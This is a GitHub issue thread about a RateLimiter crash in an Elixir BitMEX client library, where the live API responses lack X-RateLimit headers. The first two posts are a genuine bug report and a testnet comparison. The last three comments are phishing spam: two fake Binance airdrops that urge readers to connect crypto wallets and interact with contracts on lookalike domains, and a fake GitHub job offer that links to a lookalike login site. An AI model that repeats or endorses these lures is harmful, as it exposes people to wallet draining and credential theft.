### ISSUE TITLE
Bitmex.Rest.RateLimiter ArgumentError

### ISSUE THREAD

**Issue by masterkain** [nobrick/bitmex#7]
I'm trying a simple `Bitmex.Rest.Order.delete(order_ids)` against bitmex live:

```
04:08:06.439 [error] GenServer Bitmex.Rest.RateLimiter terminating
** (ArgumentError) argument error
    :erlang.element(2, nil)
    (bitmex) lib/bitmex/rest/rate_limiter.ex:57: Bitmex.Rest.RateLimiter.parse_to_int/2
    (bitmex) lib/bitmex/rest/rate_limiter.ex:35: Bitmex.Rest.RateLimiter.handle_call/3
    (stdlib) gen_server.erl:661: :gen_server.try_handle_call/4
    (stdlib) gen_server.erl:690: :gen_server.handle_msg/6
    (stdlib) proc_lib.erl:249: :proc_lib.init_p_do_apply/3
Last message (from #PID<0.1411.0>): {:set_rate, [{"Date", "Sat, 02 Mar 2019 03:08:06 GMT"}, {"Content-Type", "application/json; charset=utf-8"}, {"Content-Length", "86"}, {"Connection", "keep-alive"}, {"Set-Cookie", "AWSALB=xxxx+; Expires=Sat, 09 Mar 2019 03:08:06 GMT; Path=/"}, {"ETag", "W/\"56-ClBa+ONjQwDiPDbsrZZF0fLcWX4\""}, {"Strict-Transport-Security", "max-age=31536000; includeSubDomains"}]}
State: %{rate: %{limit: 300, remaining: 300, reset: nil}}
Client #PID<0.1411.0> is alive

    (stdlib) gen.erl:169: :gen.do_call/4
    (elixir) lib/gen_server.ex:986: GenServer.call/3
    (bitmex) lib/bitmex/rest/requester.ex:46: Bitmex.Rest.Requester.handle_info/2
    (stdlib) gen_server.erl:637: :gen_server.try_dispatch/4
    (stdlib) gen_server.erl:711: :gen_server.handle_msg/6
    (stdlib) proc_lib.erl:249: :proc_lib.init_p_do_apply/3
04:08:06.443 [error] GenServer #PID<0.1411.0> terminating
** (stop) exited in: GenServer.call(Bitmex.Rest.RateLimiter, {:set_rate, [{"Date", "Sat, 02 Mar 2019 03:08:06 GMT"}, {"Content-Type", "application/json; charset=utf-8"}, {"Content-Length", "86"}, {"Connection", "keep-alive"}, {"Set-Cookie", "AWSALB=xxxx+; Expires=Sat, 09 Mar 2019 03:08:06 GMT; Path=/"}, {"ETag", "W/\"56-ClBa+ONjQwDiPDbsrZZF0fLcWX4\""}, {"Strict-Transport-Security", "max-age=31536000; includeSubDomains"}]}, 5000)
    ** (EXIT) an exception was raised:
        ** (ArgumentError) argument error
            :erlang.element(2, nil)
            (bitmex) lib/bitmex/rest/rate_limiter.ex:57: Bitmex.Rest.RateLimiter.parse_to_int/2
            (bitmex) lib/bitmex/rest/rate_limiter.ex:35: Bitmex.Rest.RateLimiter.handle_call/3
            (stdlib) gen_server.erl:661: :gen_server.try_handle_call/4
            (stdlib) gen_server.erl:690: :gen_server.handle_msg/6
            (stdlib) proc_lib.erl:249: :proc_lib.init_p_do_apply/3
    (elixir) lib/gen_server.ex:989: GenServer.call/3
    (bitmex) lib/bitmex/rest/requester.ex:46: Bitmex.Rest.Requester.handle_info/2
    (stdlib) gen_server.erl:637: :gen_server.try_dispatch/4
    (stdlib) gen_server.erl:711: :gen_server.handle_msg/6
    (stdlib) proc_lib.erl:249: :proc_lib.init_p_do_apply/3
Last message: %HTTPoison.AsyncHeaders{headers: [{"Date", "Sat, 02 Mar 2019 03:08:06 GMT"}, {"Content-Type", "application/json; charset=utf-8"}, {"Content-Length", "86"}, {"Connection", "keep-alive"}, {"Set-Cookie", "AWSALB=xxxx+; Expires=Sat, 09 Mar 2019 03:08:06 GMT; Path=/"}, {"ETag", "W/\"56-ClBa+ONjQwDiPDbsrZZF0fLcWX4\""}, {"Strict-Transport-Security", "max-age=31536000; includeSubDomains"}], id: #Reference<0.994756842.2994995206.103419>}
State: %{async_id: #Reference<0.994756842.2994995206.103419>, client: {#PID<0.1201.0>, #Reference<0.994756842.2994995206.103385>}, request_url: "https://www.bitmex.com/api/v1/order", response: "", status_code: 400, user: {#PID<0.1227.0>, #Reference<0.994756842.2994995206.103384>}}
04:08:06.444 [error] GenServer #PID<0.1227.0> terminating
** (stop) exited in: GenServer.call(Bitmex.Rest.Client, {:auth_delete, "/order", "647811ea-f93a-6ce6-e1a4-55c6821cd8aa"}, :infinity)
    ** (EXIT) exited in: GenServer.call(Bitmex.Rest.RateLimiter, {:set_rate, [{"Date", "Sat, 02 Mar 2019 03:08:06 GMT"}, {"Content-Type", "application/json; charset=utf-8"}, {"Content-Length", "86"}, {"Connection", "keep-alive"}, {"Set-Cookie", "AWSALB=xxxx+; Expires=Sat, 09 Mar 2019 03:08:06 GMT; Path=/"}, {"ETag", "W/\"56-ClBa+ONjQwDiPDbsrZZF0fLcWX4\""}, {"Strict-Transport-Security", "max-age=31536000; includeSubDomains"}]}, 5000)
        ** (EXIT) an exception was raised:
            ** (ArgumentError) argument error
                :erlang.element(2, nil)
                (bitmex) lib/bitmex/rest/rate_limiter.ex:57: Bitmex.Rest.RateLimiter.parse_to_int/2
                (bitmex) lib/bitmex/rest/rate_limiter.ex:35: Bitmex.Rest.RateLimiter.handle_call/3
                (stdlib) gen_server.erl:661: :gen_server.try_handle_call/4
                (stdlib) gen_server.erl:690: :gen_server.handle_msg/6
                (stdlib) proc_lib.erl:249: :proc_lib.init_p_do_apply/3
    (elixir) lib/gen_server.ex:989: GenServer.call/3
    (myproj) lib/myproj/order.ex:102: Myproj.Order.ensure_stop_loss/2
    (myproj) lib/myproj/brain.ex:8: Myproj.Brain.make_decision/1
    (elixir) lib/enum.ex:769: Enum."-each/2-lists^foreach/1-0-"/2
    (elixir) lib/enum.ex:769: Enum.each/2
    (myproj) lib/myproj/brain_scheduler.ex:28: Myproj.Brain.Scheduler.handle_info/2
    (stdlib) gen_server.erl:637: :gen_server.try_dispatch/4
    (stdlib) gen_server.erl:711: :gen_server.handle_msg/6
Last message: :tick
State: []

```

any idea? thanks

**Comment by masterkain** [comment]
on testnet (in my case MIX_ENV=dev) it seems to work:

```
{:ok,
 %HTTPoison.Response{
   body: %{"error" => %{"message" => "Not Found", "name" => "HTTPError"}},
   headers: [
     {"Date", "Sat, 02 Mar 2019 16:46:22 GMT"},
     {"Content-Type", "application/json; charset=utf-8"},
     {"Content-Length", "52"},
     {"Connection", "keep-alive"},
     {"X-RateLimit-Limit", "300"},
     {"X-RateLimit-Remaining", "294"},
     {"X-RateLimit-Reset", "1551545183"},
     {"X-Powered-By", "Profit"},
     {"ETag", "W/\"34-RQXM2uXYmuIoWfjaEE+8njrbtb0\""},
     {"Strict-Transport-Security", "max-age=31536000; includeSubDomains"}
   ],
   request: nil,
   request_url: "https://testnet.bitmex.com/api/v1/order",
   status_code: 404
 }}
```

maybe in live there are no `X-RateLimit headers` at the moment? not sure.

another issue with async httpoison requests is that at present time it makes not possible to work out specs with exvcr due to this: https://github.com/parroty/exvcr/issues/75

**Comment by Teknokeys** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://giveway.binancbnbrewards.online/4JhoUO)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @CiscoFashionNYC, @CodingPeppa, @neobine, @paulespino, @zven21, @laizy, @vouliotRemi, @jumodada, @ftrain, @Abecid, @jancuk, @GabrielFeMello, @emomeni, @robymontyz, @sydneyzh, @ray-008, @jybp, @davidchai, @budedge1, @lilykissme, @CrushMiss, @donohue76, @yashpatel20, @danielmrcl, @jvalinsky, @OmniOracle, @Jeordman, @grace-mickey405, @martintorok, @gbkuce, @TimePath, @Makenya83, @DCW89, @officialjobster, @misterhuhuhu, @citra1, @yakun0622, @Developer01042003, @leo-cuellar, @genkimaru, @0xleung, @yuhonas, @PirellYO, @rollge, @synbsk, @ka-kiran, @thomasklemm, @vyahello, @tx66, @dvidvlencia

**Comment by njangra144** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @jwoo92, @antx-code, @johnnyshankman, @Absolutestunna, @easelify, @Qiangming-L, @intpp

**Comment by H4wk-eye** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
guptarohit, @crzidea, @rpip, @aaronky, @Czechh, @izqui, @michrzan, @plebasaur, @ktaube, @fravoll, @alexanderdoty, @turbosnail9, @wtigert, @calldata, @cyepler, @harrysolovay, @MansurovB-source, @alexander-yurin, @donhylo, @mpint
